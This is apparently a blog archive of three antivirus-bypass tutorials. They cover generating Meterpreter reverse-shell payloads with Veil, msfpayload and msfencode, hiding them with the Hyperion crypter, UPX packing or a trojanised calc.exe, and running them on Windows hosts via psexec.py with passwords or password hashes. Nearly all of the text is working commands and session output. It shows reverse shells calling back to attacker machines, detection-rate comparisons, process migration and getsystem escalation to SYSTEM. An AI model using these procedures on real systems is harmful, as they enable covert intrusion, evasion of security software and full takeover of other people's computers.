Archive for category AV Bypass

Veil + psexec.py = pwnage

Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.

First of all, Veil is a nice little payload generator that will generate your windows payload all within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get setup and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.

Finally, you can use CoreLab’s python version of psexec to execute your payload on a remote machine. To install, simply download the latest version of Impacket and run setup.py.

root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz
root@kali:~# tar -xzvf impacket-0.9.10.tar.gz
root@kali:~# cd impacket-0.9.10/
root@kali:~/impacket-0.9.10# python setup.py install

Let’s walk through a quick example of using both of these tools.

First, we generate a payload:

root@kali:/opt/Veil# python Veil.py 

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.81.201
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse TCP handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_tcp
 LHOST   = 192.168.81.201
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

root@kali:/opt/Veil# mv payload.exe TrustedSec.exe

Next, we start a multi/handler with “smart_migrate” enabled:

msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc 
[*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives.
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443
LPORT => 443
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate
AutoRunScript => post/windows/manage/smart_migrate
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

Now, we can use “psexec.py” to upload and execute our payload using username/password or username/hash:

Username/password example:
psexec.py TrustedSec:’InformationSecurityMadeSimple!’@192.168.81.129 cmd.exe

Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 test@192.168.81.129 cmd.exe

Psexec session:

Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139.....
[*] Found writable share ADMIN$
[*] Uploading file KDgwQrZj.exe
[*] Opening SVCManager on 192.168.81.139.....
[*] Creating service rWGK on 192.168.81.139.....
[*] Starting service rWGK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe
[*] Uploading TrustedSec.exe to ADMIN$\/
C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 192.168.81.139.....
[*] Stoping service rWGK.....
[*] Removing service rWGK.....
[*] Removing file KDgwQrZj.exe.....

Reap the shellz:

[*] Sending stage (751104 bytes) to 192.168.81.129
[*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400
[*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: TrustedSec.exe (1436)
[+] Migrating to 632
[+] Successfully migrated to process

BooYah!!!

No Comments

PE Crypters (Hyperion)

I recently watched a presentation that rel1k gave at bSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated Binary Droppers, Shellcodeexec, Powershell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE Packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted and encapsulated with a weak 128-bit AES key, which is simply brute forced at the time of execution. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools need to cross-compile executables.

root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe

Now that we have our Hyperion crypter executable. Let’s create a Metasploit payload.

root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe

Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.

As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.

root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe

And if we copy our encrypted payload to our Windows host…

Ah, nothing to see here :-) Let’s see if it works.

msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)

Oh, you know that’s right!

You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for detection. So, your best option for testing custom payloads is to simply install the version of anti-virus that you are trying to bypass.

Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors could easily create a signature for these payloads. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in later post. Happy Crypting!

No Comments

Payload Creation

I’m going to jump ahead a bit this month.  I’ve been attending the Offensive-Security Ohio Chapter meetings, hosted by Offensive-Security and Diebold, Incorporated, and lead by ReL1K.  If you have the means and you’re just getting into the business of ethical hacking, I highly recommend attending.  If you’re not in the area, the last meeting was streamed via USTREAM, so check the Offensive-Security site for details.

At the first two meetings, we learned the basics of Metasploit, Fast-Track, and SET.  I’m just going to cover the topic of creating a payload and encoding it to avoid detection from anti-virus.

First, we use “msfpayload” to dump the shell code that will produce a reverse bind Meterpreter session.  Meterpreter is the holy-grail of Metaploit.  It allows us to easily upload/download files and run commands, steal access tokens, disable AV, enable RDP and much, much more.  The reverse bind allows the session to traverse a NAT environment.  We just need to assign a port that we know will pass any egress filter, such as 80 or 443.  Here is the command that we use to create the raw data:

cd /pentest/exploits/framework3
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.147 lport=443 R > moo.raw

Next, we create an executable from the raw dump and encode it with five iterations of “Shikata ga nai” (Japanese for “it can’t be helped” or “nothing can be done about it”).  It is an encoding algorithm that we use to avoid detection from AV.

msfencode -i moo.raw -o moo.exe -e x86/shikata_ga_nai -c 5 -t exe

Let’s put this executable to the test.  VirusTotal is an excellent site that allows to upload a file, which it will scan using numerous anti-virus engines.

Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19 Trojan/Win32.Shell
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.EPACK.Gen2
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19 Win32:SwPatch
Avast5 5.0.677.0 2011.03.19 Win32:SwPatch
AVG 10.0.0.1190 2011.03.19 Win32/Heur
BitDefender 7.2 2011.03.19 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.03.19 Win32.Trojan.Swrort.A.4
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19 W32/Swrort.A.gen!Eldorado
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.19
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18 Win32/Swrort.A!generic
F-Prot 4.6.2.117 2011.03.19 W32/Swrort.A.gen!Eldorado
F-Secure 9.0.16440.0 2011.03.19 Backdoor.Shell.AC
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Backdoor.Shell.AC
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19 Riskware
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19 Trojan:Win32/Swrort.A
NOD32 5968 2011.03.19 a variant of Win32/Rozena.AH
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Backdoor.Shell.AC
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20 Mal/Swrort-C
SUPERAntiSpyware 4.40.0.1006 2011.03.19 Trojan.Backdoor-PoisonIvy
Symantec 20101.3.0.103 2011.03.19
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19
TrendMicro-HouseCall 9.200.0.1012 2011.03.19
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20 Trojan.Win32.Swrort.B (v)
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19 Trojan.Rosena.Gen.1

Not bad, but hopefully we can do better.  Another trick ReL1k taught us was to use a UPX packer, which will further help us avoid being detected.  Here is the command to create a “packed” executable:

/pentest/database/sqlmap/lib/contrib/upx/linux/upx -9 -o moo_packed.exe moo.exe
Antivirus Version Last update Result
AhnLab-V3 2011.03.20.00 2011.03.19
AntiVir 7.11.5.1 2011.03.18 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2011.03.19
Avast 4.8.1351.0 2011.03.19
Avast5 5.0.677.0 2011.03.19
AVG 10.0.0.1190 2011.03.20 Win32/Heur
BitDefender 7.2 2011.03.19 Gen:Variant.Kazy.7277
CAT-QuickHeal 11.00 2011.03.19
ClamAV 0.96.4.0 2011.03.19
Commtouch 5.2.11.5 2011.03.19
Comodo 8042 2011.03.19
DrWeb 5.0.2.03300 2011.03.19
Emsisoft 5.1.0.2 2011.03.20
eSafe 7.0.17.0 2011.03.17
eTrust-Vet 36.1.8223 2011.03.18
F-Prot 4.6.2.117 2011.03.19
F-Secure 9.0.16440.0 2011.03.19 Gen:Variant.Kazy.7277
Fortinet 4.2.254.0 2011.03.19
GData 21 2011.03.19 Gen:Variant.Kazy.7277
Ikarus T3.1.1.97.0 2011.03.19
Jiangmin 13.0.900 2011.03.18
K7AntiVirus 9.94.4155 2011.03.19
Kaspersky 7.0.0.125 2011.03.19
McAfee 5.400.0.1158 2011.03.19
McAfee-GW-Edition 2010.1C 2011.03.19
Microsoft 1.6603 2011.03.19
NOD32 5968 2011.03.19
Norman 6.07.03 2011.03.19
nProtect 2011-02-10.01 2011.02.15 Gen:Variant.Kazy.7277
Panda 10.0.3.5 2011.03.19 Suspicious file
PCTools 7.0.3.5 2011.03.19
Prevx 3.0 2011.03.20
Rising 23.49.04.05 2011.03.18
Sophos 4.63.0 2011.03.20
SUPERAntiSpyware 4.40.0.1006 2011.03.19
Symantec 20101.3.0.103 2011.03.20 Suspicious.MH690.A
TheHacker 6.7.0.1.152 2011.03.19
TrendMicro 9.200.0.1012 2011.03.19 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.03.20 PAK_Generic.001
VBA32 3.12.14.3 2011.03.18
VIPRE 8758 2011.03.20
ViRobot 2011.3.19.4366 2011.03.19
VirusBuster 13.6.258.0 2011.03.19

It’s not perfect, but definitely better.  There’s always going to be a cat-and-mouse game between the hackers and the anti-virus vendors.

One more trick.  What if we want to attach the Meterpreter payload to a known good executable, such as “calc.exe”?  Here’s a quick one-liner.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=443 R | msfencode -x ./calc.exe -k -e x86/shikata_ga_nai -c 5 -t exe -o payload_calc.exe

Then we just need to setup a listener using Metasploit’s “multi/handler”, copy “payload_calc.exe” to the victim machine and execute it.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.147
LHOST => 192.168.0.147
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.147:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.147:443 -> 192.168.0.123:1089) at Mon Mar 21 17:17:07 -0400 2011

msf exploit(handler) > sessions -i

Active sessions
===============

 Id  Type                   Information               Connection
 --  ----                   -----------               ----------
 1   meterpreter x86/win32  BUDLITE\spohnl @ BUDLITE  192.168.0.147:443 -> 192.168.0.123:1089

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Booya!  We have a Meterpreter session and the victim is none the wiser.  As a final step, we’ll want to migrate the Meterpreter session off of the calc executable so we can maintain our session after calc is closed.  Oh, and don’t forget to upgrade your access to SYSTEM!

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                 Path
 ---   ----                 ----  -------  ----                 ----
 0     [System Process]
 4     System               x86   0
 540   smss.exe             x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 612   csrss.exe            x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 636   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 680   services.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 692   lsass.exe            x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 848   vmacthlp.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 940   svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1044  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1120  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1436  explorer.exe         x86   0        BUDLITE\spohnl       C:\WINDOWS\Explorer.EXE
 1532  spoolsv.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1720  VMwareTray.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1736  VMwareUser.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1892  inetinfo.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1940  sqlservr.exe         x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 224   snmp.exe             x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\snmp.exe
 244   sqlbrowser.exe       x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
 336   vmtoolsd.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 376   VMUpgradeHelper.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 2148  alg.exe              x86   0                             C:\WINDOWS\System32\alg.exe
 3364  wuauclt.exe          x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\wuauclt.exe
 3372  cmd.exe              x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\cmd.exe
 2508  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 3700  payload_calc.exe     x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\payload_calc.exe

meterpreter > migrate 1436
[*] Migrating to 1436...
[*] Migration completed successfully.
meterpreter > getuid
Server username: BUDLITE\spohnl
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

That’s all there is to it.  Now you can have your way with this system!

No Comments